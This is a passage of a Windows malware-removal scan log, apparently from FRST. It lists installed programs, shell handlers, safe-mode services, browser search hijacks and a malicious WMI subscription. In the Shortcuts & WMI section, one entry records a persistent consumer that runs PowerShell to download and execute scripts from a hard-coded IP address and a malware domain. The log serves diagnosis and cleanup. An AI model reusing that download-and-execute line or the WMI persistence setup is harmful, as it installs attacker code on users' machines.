Product Improvement Study for HP ENVY 7640 series (HKLM\...\{9913BFAE-5E18-4863-8354-452337781573}) (Version: 34.2.117.50647 - Hewlett-Packard Co.)
Realtek Ethernet Controller Driver For Windows 7 (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.18.322.2010 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6122 - Realtek Semiconductor Corp.)
REALTEK Wireless LAN Software (HKLM-x32\...\{901F0D4C-009D-1112-8DE4-03599E7B0C5C}) (Version: 1.00.10.0329 - REALTEK Semiconductor Corp.)
Recovery Manager (HKLM-x32\...\{44B2A0AB-412E-4F8C-B058-D1E8AECCDFF5}) (Version: 5.5.3023 - CyberLink Corp.) Hidden
Savings Bond Wizard (HKLM-x32\...\{566DBD89-9955-4024-9384-A6301C8C6584}) (Version: 4.15 - )
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 15.1.6.64 - Synaptics Incorporated)
Tweaking.com - Windows Repair (HKLM-x32\...\Tweaking.com - Windows Repair) (Version: 4.12.4 - Tweaking.com)
Update for 2007 Microsoft Office System (KB967642) (HKLM-x32\...\{90120000-0011-0000-0000-0000000FF1CE}_PROPLUS_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
Verizon Cloud (HKLM-x32\...\Verizon Cloud) (Version: 4.1.0 - Verizon Wireless)
VisualBee for Microsoft PowerPoint (HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\...\VisualBee for Microsoft PowerPoint) (Version: V4.1 - VisualBee.com)
VisualBee for Microsoft PowerPoint (HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\...\VisualBee for Microsoft PowerPoint) (Version: V4.1 - VisualBee.com)
VisualBee for Microsoft PowerPoint (HKU\S-1-5-21-1250379553-2428740185-3603661230-501\...\VisualBee for Microsoft PowerPoint) (Version: V4.1 - VisualBee.com)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite_Wave3) (Version: 14.0.8117.0416 - Microsoft Corporation)
Windows Live ID Sign-in Assistant (HKLM\...\{9B48B0AC-C813-4174-9042-476A887592C7}) (Version: 6.500.3165.0 - Microsoft Corporation)
Windows Live Sync (HKLM-x32\...\{B10914FD-8812-47A4-85A1-50FCDE7F1F33}) (Version: 14.0.8117.416 - Microsoft Corporation)
Windows Live Upload Tool (HKLM-x32\...\{205C6BDD-7B73-42DE-8505-9A093F35A238}) (Version: 14.0.8014.1029 - Microsoft Corporation)
 
==================== Custom CLSID (Whitelisted): ==============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
ShellServiceObjects: MediaCenterSSO Class -> {6FDEDD65-AC51-43CA-B2D0-9EB5D1155D03} => C:\Windows\ehome\ehSSO.dll
ContextMenuHandlers1: [McCtxMenuFrmWrk] -> {CCA9EFD3-29ED-430A-BA6D-E6BBFF0A60C2} => c:\Program Files\McAfee\MSC\McCtxMenuFrmWrk.dll [2016-12-21] (McAfee, Inc. -> McAfee, Inc.)
ContextMenuHandlers4: [MSSE] -> {0365FE2C-F183-4091-AC82-BFC39FB75C49} =>  -> No File
ContextMenuHandlers4: [Offline Files] -> {474C98EE-CF3D-41f5-80E3-4AAB0AB04301} =>  -> No File
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\Windows\system32\igfxpph.dll [2010-08-25] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
ContextMenuHandlers6: [McCtxMenuFrmWrk] -> {CCA9EFD3-29ED-430A-BA6D-E6BBFF0A60C2} => c:\Program Files\McAfee\MSC\McCtxMenuFrmWrk.dll [2016-12-21] (McAfee, Inc. -> McAfee, Inc.)
ContextMenuHandlers6: [Offline Files] -> {474C98EE-CF3D-41f5-80E3-4AAB0AB04301} =>  -> No File
 
==================== Codecs (Whitelisted) ====================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Drivers32: [vidc.xvid] => C:\Windows\SysWOW64\xvid.dll [602112 2015-02-10] () [File not signed]
 
==================== Shortcuts & WMI ========================
 
(The entries could be listed to be restored or removed.)
 
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"killmm4\"",Filter="__EventFilter.Name=\"killmm3\"::
WMI:subscription\__EventFilter->killmm3::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System']
WMI:subscription\CommandLineEventConsumer->killmm4::[CommandLineTemplate => cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.0810bye.r...|powershell.exeIEX (New-Object system.Net.WebClient).DownloadString('http://172.83.155.170:8170/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http:/ (the data entry has 362 more characters).]
 
==================== Loaded Modules (Whitelisted) =============
 
2022-03-28 09:48 - 2022-03-28 10:29 - 004122624 _____ () [File not signed] c:\windows\debug\item.dat
 
==================== Alternate Data Streams (Whitelisted) ========
 
==================== Safe Mode (Whitelisted) ==================
 
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AppXSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\BFE => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\BITS => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\camsvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\ClipSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\dps => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\dump_F928BDEE.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\lfsvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMInstallerService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\ModuleCoreService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MpsSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MsF928BDEEApp => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\msiserver => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\semgrsvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\SharedAccess => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\shellhwdetection => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\TokenBroker => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\TweakingRemoveSafeBoot => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\vss => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\WSService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AppXSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\atashost => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\BITS => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\camsvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ClipSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dps => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dump_F928BDEE.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\lfsvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMInstallerService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcapexe => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McNaiAnn => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MCODS => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefire => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfemms => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeplk => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeplk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfevtp => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ModuleCoreService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MsF928BDEEApp => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\msiserver => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SamSs => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\semgrsvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\shellhwdetection => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\srv => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\srv2 => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\srvnet => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\TokenBroker => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\TweakingRemoveSafeBoot => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vss => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WSService => ""="Service"
 
==================== Association (Whitelisted) =================
 
==================== Internet Explorer (Version 11) (Whitelisted) ==========
 
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://us.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_secureddownload_16_45_ssg02&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dus%26pa%3Dwinyahoo%26cd%3D2XzuyEtN2Y1L1QzuyBtD0FtC0AtC0FyC0B0AzztDtBzz0FzytN0D0Tzu0StCyByBtBtN1L2XzutAtFtByEtFtCtAtFyDtCtN1L1Czu1BtBtN1L1G1B1V1N2Y1L1Qzu2StC0C0Ezy0EtDtB0DtGtA0B0B0CtGyB0EyD0EtGtByE0B0EtGzytDyE0ByD0CzztDtDtCyB0B2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyD0EzzyCyDzzyEyEtG0Czz0A0AtGyE0DzzzztGzzyCyBtAtGtBtC0F0E0CtA0EyEzztB0FtB2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCtDyDzyyB%26cr%3D1051686640%26a%3Dwbf_secureddownload_16_45_ssg02%26os_ver%3D6.1%26os%3DWindows%2B7%2BHome%2BPremium
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.yahoo.com/?fr=befhp&type=iehp-3.19-1703
HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.yahoo.com/?fr=befhp&type=iehp-3.19-1703
HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.yahoo.com/?fr=fp-yie9
HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\Software\Microsoft\Internet Explorer\Main,Old Start Page = hxxps://www.yahoo.com/?fr=befhp&type=iehp-3.19-1703
HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.yahoo.com/?fr=fp-yie9
HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.yahoo.com/?fr=fp-yie9
HKU\S-1-5-21-1250379553-2428740185-3603661230-501\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.yahoo.com/?fr=fp-yie9
URLSearchHook: HKU\S-1-5-21-1250379553-2428740185-3603661230-1000 - (No Name) - {D3D233D5-9F6D-436C-B6C7-E63F77503B30} - No File
URLSearchHook: HKU\S-1-5-21-1250379553-2428740185-3603661230-1000 - (No Name) - {575bddf5-790a-4d01-a37d-2863dec1c085} - No File
URLSearchHook: HKU\S-1-5-21-1250379553-2428740185-3603661230-1000 - (No Name) - {81017EA9-9AA8-4A6A-9734-7AF40E7D593F} - No File
URLSearchHook: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 - (No Name) - {D3D233D5-9F6D-436C-B6C7-E63F77503B30} - No File
URLSearchHook: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 - (No Name) - {575bddf5-790a-4d01-a37d-2863dec1c085} - No File
URLSearchHook: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 - (No Name) - {81017EA9-9AA8-4A6A-9734-7AF40E7D593F} - No File
URLSearchHook: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 - (No Name) - {8a7d2060-824d-4b17-b00a-759b1b5f30d9} - No File
URLSearchHook: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 - (No Name) - {26842a09-ffa8-4e2c-ae12-0c80f01c3295} - No File
URLSearchHook: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 - (No Name) - {D3D233D5-9F6D-436C-B6C7-E63F77503B30} - No File
URLSearchHook: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 - (No Name) - {575bddf5-790a-4d01-a37d-2863dec1c085} - No File
URLSearchHook: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 - (No Name) - {81017EA9-9AA8-4A6A-9734-7AF40E7D593F} - No File
SearchScopes: HKLM -> DefaultScope {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_secureddownload_16_45_ssg02&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3Dwinyahoo%26cd%3D2XzuyEtN2Y1L1QzuyBtD0FtC0AtC0FyC0B0AzztDtBzz0FzytN0D0Tzu0StCyByBtBtN1L2XzutAtFtByEtFtCtAtFyDtCtN1L1Czu1BtBtN1L1G1B1V1N2Y1L1Qzu2StC0C0Ezy0EtDtB0DtGtA0B0B0CtGyB0EyD0EtGtByE0B0EtGzytDyE0ByD0CzztDtDtCyB0B2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyD0EzzyCyDzzyEyEtG0Czz0A0AtGyE0DzzzztGzzyCyBtAtGtBtC0F0E0CtA0EyEzztB0FtB2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCtDyDzyyB%26cr%3D1051686640%26a%3Dwbf_secureddownload_16_45_ssg02%26os_ver%3D6.1%26os%3DWindows%2B7%2BHome%2BPremium&p={searchTerms}
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://start.mysearchdial.com/results.php?f=4&q={searchTerms}&a=app_14_12_ie&cd=2XzuyEtN2Y1L1QzuyBtD0FtC0AtC0FyC0B0AzztDtBzz0FzytN0D0Tzu0SzztCtBtN1L2XzutBtFtCzztFyBtFtDtN1L1CzutCyEtDtAtDyD1V1StN1L1G1B1V1N2Y1L1Qzu2StBtBzz0DyByDyBtDtG0AtC0BtBtG0C0FzzyDtGyC0ByB0DtGyE0CtByC0ByDtB0EtByByE0B2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyCyB0AyCyE0BzyzytG0EyEtCyEtG0FyD0AyCtGtB0E0CtBtGyCtA0FtA0D0FyEyB0D0AyEzz2Q&cr=9292952&ir=
SearchScopes: HKLM -> {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_secureddownload_16_45_ssg02&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3Dwinyahoo%26cd%3D2XzuyEtN2Y1L1QzuyBtD0FtC0AtC0FyC0B0AzztDtBzz0FzytN0D0Tzu0StCyByBtBtN1L2XzutAtFtByEtFtCtAtFyDtCtN1L1Czu1BtBtN1L1G1B1V1N2Y1L1Qzu2StC0C0Ezy0EtDtB0DtGtA0B0B0CtGyB0EyD0EtGtByE0B0EtGzytDyE0ByD0CzztDtDtCyB0B2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyD0EzzyCyDzzyEyEtG0Czz0A0AtGyE0DzzzztGzzyCyBtAtGtBtC0F0E0CtA0EyEzztB0FtB2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCtDyDzyyB%26cr%3D1051686640%26a%3Dwbf_secureddownload_16_45_ssg02%26os_ver%3D6.1%26os%3DWindows%2B7%2BHome%2BPremium&p={searchTerms}
SearchScopes: HKLM -> {77AA745B-F4F8-45DA-9B14-61D2D95054C8} URL = 
SearchScopes: HKLM -> {AADC8CF6-CE83-45D8-8B4C-5C9D3E393460} URL = hxxp://www.ask.com/web?q={searchterms}&l=dis&o=ushpl
SearchScopes: HKLM -> {C7BEFF53-0739-431F-893F-63670C6CE2F8} URL = hxxp://en.wikipedia.org/wiki/Special:Search?search={searchTerms}
SearchScopes: HKLM -> {D2539E59-E453-4A9D-B465-200A7C22E0B5} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPNTDF
SearchScopes: HKLM-x32 -> DefaultScope {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_secureddownload_16_45_ssg02&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3Dwinyahoo%26cd%3D2XzuyEtN2Y1L1QzuyBtD0FtC0AtC0FyC0B0AzztDtBzz0FzytN0D0Tzu0StCyByBtBtN1L2XzutAtFtByEtFtCtAtFyDtCtN1L1Czu1BtBtN1L1G1B1V1N2Y1L1Qzu2StC0C0Ezy0EtDtB0DtGtA0B0B0CtGyB0EyD0EtGtByE0B0EtGzytDyE0ByD0CzztDtDtCyB0B2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyD0EzzyCyDzzyEyEtG0Czz0A0AtGyE0DzzzztGzzyCyBtAtGtBtC0F0E0CtA0EyEzztB0FtB2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCtDyDzyyB%26cr%3D1051686640%26a%3Dwbf_secureddownload_16_45_ssg02%26os_ver%3D6.1%26os%3DWindows%2B7%2BHome%2BPremium&p={searchTerms}
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM-x32 -> {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_secureddownload_16_45_ssg02&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3Dwinyahoo%26cd%3D2XzuyEtN2Y1L1QzuyBtD0FtC0AtC0FyC0B0AzztDtBzz0FzytN0D0Tzu0StCyByBtBtN1L2XzutAtFtByEtFtCtAtFyDtCtN1L1Czu1BtBtN1L1G1B1V1N2Y1L1Qzu2StC0C0Ezy0EtDtB0DtGtA0B0B0CtGyB0EyD0EtGtByE0B0EtGzytDyE0ByD0CzztDtDtCyB0B2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyD0EzzyCyDzzyEyEtG0Czz0A0AtGyE0DzzzztGzzyCyBtAtGtBtC0F0E0CtA0EyEzztB0FtB2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCtDyDzyyB%26cr%3D1051686640%26a%3Dwbf_secureddownload_16_45_ssg02%26os_ver%3D6.1%26os%3DWindows%2B7%2BHome%2BPremium&p={searchTerms}
SearchScopes: HKLM-x32 -> {AADC8CF6-CE83-45D8-8B4C-5C9D3E393460} URL = hxxp://www.ask.com/web?q={searchterms}&l=dis&o=ushpl
SearchScopes: HKLM-x32 -> {b0441a0e-a49a-4e16-afc1-74ecced1921f} URL = hxxp://search.mywebsearch.com/mywebsearch/GGmain.jhtml?id=UXxdm011YYus&ptb=27ACC159-EE0E-4BC7-9AF7-0AD838A4715E&ind=2012012609&ptnrS=UXxdm011YYus&si=maps4pc&n=77ece041&psa=&st=sb&searchfor={searchTerms}
SearchScopes: HKLM-x32 -> {C7BEFF53-0739-431F-893F-63670C6CE2F8} URL = hxxp://en.wikipedia.org/wiki/Special:Search?search={searchTerms}
SearchScopes: HKLM-x32 -> {D2539E59-E453-4A9D-B465-200A7C22E0B5} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPNTDF
SearchScopes: HKU\.DEFAULT -> DefaultScope {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = 
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1000 -> DefaultScope {005D2A05-0F31-4191-B3D0-EB5F0B615403} URL = hxxps://search.yahoo.com/search?ei=utf-8&fr=befds&p={searchTerms}&type=ieds-3.19-1703
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1000 -> {005D2A05-0F31-4191-B3D0-EB5F0B615403} URL = hxxps://search.yahoo.com/search?ei=utf-8&fr=befds&p={searchTerms}&type=ieds-3.19-1703
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1000 -> {0CE02FFA-A6B0-46F6-BA2F-BD32C3630126} URL = hxxps://search.yahoo.com/search?p={searchTerms}&ei=utf-8&fr=chr-yie11
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1000 -> {0EF36D49-D6DD-4970-86E0-3DA2639E10A2} URL = hxxps://www.flickr.com/search/?q={searchTerms}
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1000 -> {180780f0-b348-4b44-8210-94a8f3ee15b2} URL = hxxp://search.comcast.net/search/?cat=Web&con=toolbar&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1000 -> {4937BE7D-D79B-4503-916B-57CD4454756C} URL = hxxp://websearch.shopathome.com?user_id={2F05AB4E-12C0-40B1-A060-7D2D2A519D8A}&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1000 -> {77AA745B-F4F8-45DA-9B14-61D2D95054C8} URL = 
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1000 -> {786CACE0-4B52-4B5E-9B22-4A8063236C63} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_secureddownload_16_45_ssg02&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3Dwinyahoo%26cd%3D2XzuyEtN2Y1L1QzuyBtD0FtC0AtC0FyC0B0AzztDtBzz0FzytN0D0Tzu0StCyByBtBtN1L2XzutAtFtByEtFtCtAtFyDtCtN1L1Czu1BtBtN1L1G1B1V1N2Y1L1Qzu2StC0C0Ezy0EtDtB0DtGtA0B0B0CtGyB0EyD0EtGtByE0B0EtGzytDyE0ByD0CzztDtDtCyB0B2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyD0EzzyCyDzzyEyEtG0Czz0A0AtGyE0DzzzztGzzyCyBtAtGtBtC0F0E0CtA0EyEzztB0FtB2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCtDyDzyyB%26cr%3D1051686640%26a%3Dwbf_secureddownload_16_45_ssg02%26os_ver%3D6.1%26os%3DWindows%2B7%2BHome%2BPremium&p={searchTerms}
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1000 -> {7E61AF70-4BD4-4DBE-94F6-5E1B8E2439C9} URL = 
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1000 -> {9FB3E5E8-5531-442C-9220-713860FD4F3D} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei=utf-8&fr=chr-yie9
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1000 -> {AADC8CF6-CE83-45D8-8B4C-5C9D3E393460} URL = 
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1000 -> {BE8412CE-D220-4DA3-8A9F-1431ECED16DD} URL = hxxps://delicious.com/search?p={searchTerms}
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1000 -> {C04B7D22-5AEC-4561-8F49-27F6269208F6} URL = hxxp://www2.inbox.com/search/dispatcher.aspx?tp=bs&qkw={searchTerms}&tbid=82669&iwk=345&lng=en
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1000 -> {C7BEFF53-0739-431F-893F-63670C6CE2F8} URL = 
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1000 -> {D2539E59-E453-4A9D-B465-200A7C22E0B5} URL = 
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1000 -> {F48980A0-589B-49F1-A35C-E7FF0B3C1B87} URL = hxxp://websearch.ask.com/redirect?client=ie&tb=ORJ&o=&src=kw&q={searchTerms}&locale=&apn_ptnrs=TV&apn_dtid=OSJ000YYUS&apn_uid=812BB0DA-AC09-4FF2-B5D6-F057151DD57C&apn_sauid=64628F7A-C26D-4635-A60F-4215D454D17B
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 -> {0CE02FFA-A6B0-46F6-BA2F-BD32C3630126} URL = hxxps://search.yahoo.com/search?p={searchTerms}&ei=utf-8&fr=chr-yie11
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 -> {0EF36D49-D6DD-4970-86E0-3DA2639E10A2} URL = hxxps://www.flickr.com/search/?q={searchTerms}
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 -> {2E85A483-4CB6-4841-BAFE-CFE8617C6789} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei=utf-8&fr=chr-yie9
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 -> {4937BE7D-D79B-4503-916B-57CD4454756C} URL = hxxp://websearch.shopathome.com?user_id={2F05AB4E-12C0-40B1-A060-7D2D2A519D8A}&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 -> {54069629-7150-4432-85AD-826C66E24923} URL = hxxp://delicious.com/search?p={searchTerms}
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 -> {77AA745B-F4F8-45DA-9B14-61D2D95054C8} URL = 
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 -> {786CACE0-4B52-4B5E-9B22-4A8063236C63} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_secureddownload_16_45_ssg02&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3Dwinyahoo%26cd%3D2XzuyEtN2Y1L1QzuyBtD0FtC0AtC0FyC0B0AzztDtBzz0FzytN0D0Tzu0StCyByBtBtN1L2XzutAtFtByEtFtCtAtFyDtCtN1L1Czu1BtBtN1L1G1B1V1N2Y1L1Qzu2StC0C0Ezy0EtDtB0DtGtA0B0B0CtGyB0EyD0EtGtByE0B0EtGzytDyE0ByD0CzztDtDtCyB0B2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyD0EzzyCyDzzyEyEtG0Czz0A0AtGyE0DzzzztGzzyCyBtAtGtBtC0F0E0CtA0EyEzztB0FtB2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCtDyDzyyB%26cr%3D1051686640%26a%3Dwbf_secureddownload_16_45_ssg02%26os_ver%3D6.1%26os%3DWindows%2B7%2BHome%2BPremium&p={searchTerms}
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 -> {7E61AF70-4BD4-4DBE-94F6-5E1B8E2439C9} URL = 
